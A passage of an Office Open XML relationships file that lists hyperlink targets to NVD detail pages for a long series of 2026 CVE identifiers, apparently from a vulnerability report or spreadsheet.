Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69649" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69671" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69676" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69678" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69686" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69712" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69722" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69729" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69740" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69742" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69759" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69764" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69767" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69772" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69778" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69784" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69797" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70351" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71352" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72933" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72940" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72950" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72959" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72960" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72972" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72973" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72986" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73018" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77105" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77504" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77901" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77907" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77908" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78439" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78442" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78463" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78504" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78505" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78507" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78511" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78512" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78514" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78517" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78518" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78519" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78521" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78524" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78525" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78526" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78834" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79376" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79602" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80074" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80077" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80080" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80081" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80085" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81352" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81385" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81952" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81955" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81996" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82536" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83998" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85877" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86076" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86083" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86730" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12611" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33197" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62648" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62649" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62650" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86727" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86732" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86738" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34223" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61517" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75990" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75991" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76190" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77109" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77774" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79721" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80097" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86510" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86712" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86722" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58113" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74860" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75993" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85384" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75999" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77827" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86819" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19203" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72958" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72961" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72962" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76191" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76202" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77968" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83939" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86600" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47297" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55007" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69325" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69380" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId330" /><Relationship 